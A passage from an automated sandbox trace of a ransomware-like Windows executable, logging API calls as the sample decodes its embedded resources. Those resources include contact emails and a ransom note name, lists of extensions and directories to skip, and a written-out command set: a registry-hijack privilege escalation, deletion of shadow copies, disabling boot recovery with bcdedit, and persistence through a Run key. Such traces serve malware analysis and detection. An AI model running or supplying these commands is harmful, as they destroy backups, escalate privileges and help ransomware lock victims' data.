hResInfo=0x51c330) returned 0x26 [0112.707] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.707] GetCPInfo (in: CodePage=0xfde9, lpCPInfo=0x12fa3c | out: lpCPInfo=0x12fa3c) returned 1 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.707] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1414f60, cbMultiByte=38, lpWideCharStr=0x140de4c, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.707] FreeResource (hResData=0x50d64c) returned 0 [0112.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.707] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x1414f64, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.707] GetCurrentThreadId () returned 0xd84 [0112.707] GetCurrentThreadId () returned 0xd84 [0112.707] GetCurrentThreadId () returned 0xd84 [0112.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 239 [0112.708] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ccd18, cbMultiByte=239, lpWideCharStr=0x13d2e7c, cchWideChar=239 | out: lpWideCharStr="13StarterProcessMutex4\r\n24MainProcessMutex5\r\n35Brother1ProcessMutex6\r\n46Brother2ProcessMutex7\r\n300\r\nCOSLb0cVd9bCx1vp\r\nhttp://statcs.s76.r53.com.ua\r\n131072\r\nbluetablet9643@yahoo.com\r\ndecodedecode@yandex.ru\r\nBl0cked-ReadMe.rtf\r\ndesktop.ini\r\n") returned 239 [0112.708] GetCurrentThreadId () returned 0xd84 [0112.708] GetCurrentThreadId () returned 0xd84 [0112.708] GetCurrentThreadId () returned 0xd84 [0112.708] GetCommandLineW () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.708] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5") returned 0x11 [0112.708] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x13c399c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp") returned 0x24 [0112.708] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 1 [0112.709] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local") returned 1 [0112.710] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=7, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0112.711] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=24, fCreate=0 | out: pszPath="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 1 [0112.712] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=0, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0112.713] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=25, fCreate=0 | out: pszPath="C:\\Users\\Public\\Desktop") returned 1 [0112.713] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=32, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files") returned 1 [0112.714] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=41, fCreate=0 | out: pszPath="C:\\Windows\\system32") returned 1 [0112.714] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x13c39b4, csidl=40, fCreate=0 | out: pszPath="C:\\Users\\EEBsYm5") returned 1 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%COMPUTERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="CRH2YWU7") returned 0x9 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%USERNAME%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="EEBsYm5") returned 0x8 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%APPDATA%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\Users\\EEBsYm5\\AppData\\Roaming") returned 0x21 [0112.716] ExpandEnvironmentStringsW (in: lpSrc="%ALLUSERSPROFILE%", lpDst=0x13ac63c, nSize=0x8000 | out: lpDst="C:\\ProgramData") returned 0xf [0112.716] FindResourceW (hModule=0x400000, lpName="CMDS", lpType=0xa) returned 0x51c380 [0112.716] LoadResource (hModule=0x400000, hResInfo=0x51c380) returned 0x50d72c [0112.716] SizeofResource (hModule=0x400000, hResInfo=0x51c380) returned 0x582 [0112.716] LockResource (hResData=0x50d72c) returned 0x50d72c [0112.716] FreeResource (hResData=0x50d72c) returned 0 [0112.716] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.716] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.716] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.716] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.716] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.716] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.717] FreeResource (hResData=0x50d64c) returned 0 [0112.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.717] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 1410 [0112.717] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13ae688, cbMultiByte=1410, lpWideCharStr=0x13c9afc, cchWideChar=1410 | out: lpWideCharStr="%CD%\r\n%SystemRoot%\\system32\\cmd.exe\r\n%SystemRoot%\\system32\\shell32.dll\r\nreg copy \"HKCR\\mscfile\" \"HKCU\\Software\\Classes\\mscfile\" /s /f && reg add \"HKCU\\Software\\Classes\\mscfile\\shell\\open\\command\" /ve /t REG_EXPAND_SZ /d \"[MAIN_PATH]\" /f && \"[AE_PATH]\" & reg delete \"HKCU\\Software\\Classes\\mscfile\" /f\r\nprocess call create \"cmd.exe /c vssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\"\r\nvssadmin.exe delete shadows /all /quiet & bcdedit.exe /set {default} recoveryenabled no & bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures\r\nCACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"\r\nreg add \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"[HTA_NAME]\" /t REG_SZ /f /d \"\\\"[HTA_PATH]\"\\\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\"\r\ntype \"[FROM_PATH]\" > \"[TO_PATH]\" && \"[TO_PATH]\" [PARAMS]\r\nattrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"\r\nexplorer.exe \"[DIR_NAME]\" & type \"[DIR_NAME]\\[HID_NAME]\" > \"%TEMP%\\[EXE_NAME]\" && \"%TEMP%\\[EXE_NAME]\"\r\nreg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /f && reg add \"HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Icons\" /v \"29\" /t REG_SZ /f /d \"[ICO_PATH],0\"\r\ntaskkill /f /IM explorer.exe && start explorer.exe\r\n") returned 1410 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThreadId () returned 0xd84 [0112.717] GetCurrentThread () returned 0xfffffffe [0112.717] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0x0) returned 0 [0112.717] GetLastError () returned 0x3f0 [0112.717] GetCurrentProcess () returned 0xffffffff [0112.717] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc64 | out: TokenHandle=0x12fc64*=0xb8) returned 1 [0112.717] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x2, TokenInformation=0x13c7ae0, TokenInformationLength=0x400, ReturnLength=0x12fc60 | out: TokenInformation=0x13c7ae0, ReturnLength=0x12fc60) returned 1 [0112.717] CloseHandle (hObject=0xb8) returned 1 [0112.717] AllocateAndInitializeSid (in: pIdentifierAuthority=0x4e3754, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x12fc5c | out: pSid=0x12fc5c*=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.717] EqualSid (pSid1=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b44*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 0 [0112.717] EqualSid (pSid1=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 0 [0112.717] EqualSid (pSid1=0x226440*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), pSid2=0x13c7b6c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0112.718] GetCurrentProcess () returned 0xffffffff [0112.718] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x12fc68 | out: TokenHandle=0x12fc68*=0xb8) returned 1 [0112.718] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12fc64 | out: TokenInformation=0x0, ReturnLength=0x12fc64) returned 0 [0112.718] GetLastError () returned 0x7a [0112.718] LocalAlloc (uFlags=0x0, uBytes=0x14) returned 0x2276e0 [0112.718] GetTokenInformation (in: TokenHandle=0xb8, TokenInformationClass=0x19, TokenInformation=0x2276e0, TokenInformationLength=0x14, ReturnLength=0x12fc64 | out: TokenInformation=0x2276e0, ReturnLength=0x12fc64) returned 1 [0112.718] GetSidSubAuthorityCount (pSid=0x2276e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 0x2276e9 [0112.718] GetSidSubAuthority (pSid=0x2276e8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0x2276f0 [0112.718] LocalFree (hMem=0x2276e0) returned 0x0 [0112.718] CloseHandle (hObject=0xb8) returned 1 [0112.718] GetDriveTypeW (lpRootPathName="Z:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="Y:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="X:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="W:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="V:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="U:\\") returned 0x1 [0112.718] GetDriveTypeW (lpRootPathName="T:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="S:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="R:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="Q:\\") returned 0x1 [0112.719] GetDriveTypeW (lpRootPathName="P:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="O:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="N:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="M:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="L:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="K:\\") returned 0x1 [0112.825] GetDriveTypeW (lpRootPathName="J:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="I:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="H:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="G:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="F:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="E:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="D:\\") returned 0x1 [0112.826] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0112.826] FindResourceW (hModule=0x400000, lpName="NDNF", lpType=0xa) returned 0x51c420 [0112.826] LoadResource (hModule=0x400000, hResInfo=0x51c420) returned 0x516824 [0112.826] SizeofResource (hModule=0x400000, hResInfo=0x51c420) returned 0x267 [0112.826] LockResource (hResData=0x516824) returned 0x516824 [0112.827] FreeResource (hResData=0x516824) returned 0 [0112.827] FindResourceW (hModule=0x400000, lpName="CHAK", lpType=0xa) returned 0x51c330 [0112.827] LoadResource (hModule=0x400000, hResInfo=0x51c330) returned 0x50d64c [0112.827] SizeofResource (hModule=0x400000, hResInfo=0x51c330) returned 0x26 [0112.827] LockResource (hResData=0x50d64c) returned 0x50d64c [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 38 [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1415008, cbMultiByte=38, lpWideCharStr=0x140deac, cchWideChar=38 | out: lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P\r\n42\r\n") returned 38 [0112.827] FreeResource (hResData=0x50d64c) returned 0 [0112.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0112.827] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", cchWideChar=32, lpMultiByteStr=0x141500c, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="kQmxlKgqYq97OjjM8tuCoiCC94l6BG4P", lpUsedDefaultChar=0x0) returned 32 [0112.827] GetCurrentThreadId () returned 0xd84 [0112.827] GetCurrentThreadId () returned 0xd84 [0112.827] GetCurrentThreadId () returned 0xd84 [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 615 [0112.827] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x13a0128, cbMultiByte=615, lpWideCharStr=0x13ac65c, cchWideChar=615 | out: lpWideCharStr="[NF_START]\r\nAST\r\nAFN\r\nELST\r\nEXE\r\nLNK\r\nHTA\r\nPEK\r\nSEK\r\nB10CKED\r\nTMP\r\nICO\r\n000\r\nSYS\r\nDAT\r\nRTF\r\nINF\r\nDLL\r\nDAT\r\nREG\r\nDRV\r\nDEV\r\nPIF\r\nMBR\r\nINI\r\nXML\r\nLIST\r\nTTF\r\nLOG\r\nJA\r\nCOM\r\nBAT\r\nCMD\r\nVBS\r\nJS\r\nCFG\r\nDOWNLOAD\r\nNFO\r\nMSI\r\nCHK\r\nDMP\r\nMUI\r\nDUN\r\nISP\r\nISW\r\nCAB\r\nEFI\r\nHLP\r\nMSU\r\nHLP\r\nBIN\r\nLNG\r\nTORRENT_INFO\r\nTORRENT\r\nHTM\r\nHTML\r\nCHM\r\nLANG\r\nSTYLE\r\nMP3\r\nFLAC\r\nOGG\r\nWMA\r\nGIF\r\nJAVA\r\nCUR\r\nANI\r\n[NF_END]\r\n[ND_START]\r\n\\WINDOWS\r\n\\PROGRAM FILES\r\n\\GAMES\r\n\\APPDATA\\\r\n\\APPLICATION DATA\\\r\n\\LOCAL SETTINGS\\\r\n\\TEMP\\\r\n\\PROGRAMDATA\\\r\n\\BOOT\\\r\n\\MSOCACHE\\\r\n\\DEFAULT USER\\\r\n\\SAMPLE\r\n\\EXAMPLE\r\n\\I386\r\n\\TEMPORARY\r\n\\TOR BROWSER\\\r\n\\BROWSER\r\nBROWSER\\\r\n[ND_END]") returned 615 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_START]", cchCount2=10) returned 2 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="[NF_START]", cchCount1=10, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AST", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ELST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EXE", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTA", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.827] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SEK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="B10CKED", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ICO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="000", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SYS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="RTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DLL", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="REG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DRV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DEV", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PIF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MBR", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="XML", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LIST", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TTF", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LOG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JA", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="COM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BAT", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CMD", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="VBS", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JS", cchCount1=2, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CFG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DOWNLOAD", cchCount1=8, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NFO", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHK", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DMP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MUI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DUN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.828] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ISW", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CAB", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EFI", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="MSU", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HLP", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="BIN", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LNG", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT_INFO", cchCount1=12, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TORRENT", cchCount1=7, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HTML", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CHM", cchCount1=3, lpString2="[NF_END]", cchCount2=8) returned 3 [0112.829] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LANG", cchCount1=4, lpString2="[NF_END]", cchCount2=8) returned 3 